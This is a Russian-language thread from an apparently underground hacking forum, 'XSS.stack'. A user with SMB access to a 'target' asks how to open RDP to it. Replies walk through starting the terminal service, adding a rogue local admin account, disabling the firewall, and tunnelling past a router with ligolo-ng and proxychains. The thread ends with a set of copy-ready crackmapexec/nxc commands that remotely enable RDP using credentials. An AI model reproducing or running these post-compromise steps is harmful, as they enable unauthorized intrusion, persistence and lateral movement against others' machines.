• XSS.stack #1 – первый литературный журнал от юзеров форума

SMB -> RDP

SlowMan

(L3) cache
Забанен
Регистрация
22.07.2023
Сообщения
167
Реакции
6
Пожалуйста, обратите внимание, что пользователь заблокирован
Вопрос следующий:
Допустим есть доступ по SMB к таргету. Как можно сделать что бы был коннект по рдп?
Нужен конкретный пример
 
Пожалуйста, обратите внимание, что пользователь заблокирован
запустить termserv если он офф
ну и добавить юзера локального с пасом и правами на рдп
А если рдп порт закрыт?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
что значит закрыт? закрыт чем файрволом или сервис не запущен?
выключить фаер если есть права, поменять порт для рдп и тд
Закрыт на уровне роутера предположим.
Какие есть варианты?
 
если "закрыт" для внешнего мира но открыт для локальных сетей тогда пробросить порт (ligolo-ng) . Но для начала нужно собрать информацию минимальную: 1) запущена ли служба RDP, winrm 2) юзер имеет нужные разрешения через группы
 
Закрыт на уровне роутера предположим.
Какие есть варианты?
Если он закрыт внешне на роутере, то пробросить прокси\тунель.
И дальше работать проксичейном из локальной сети, в 90% случаев это решит проблему.
Дальше если он не работает, то Выше писали команду для активации термсерва.
Если не срабатывает, то оффаем фаервол на нужной тачке
 
nxc smb 192.168.1.1 -u user -p pass -M rdp

Enables/Disables RDP
About Module : -M rdp , all are inefficient.



crackmapexec or nxc smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable
crackmapexec or nxc smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable-ram

crackmapexec or nxc smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o METHOD=smb ACTION=enable
crackmapexec or nxc smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o METHOD=smb ACTION=enable-ram

crackmapexec or nxc smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o METHOD=wmi ACTION=enable
crackmapexec or nxc smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o METHOD=wmi ACTION=enable-ram
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх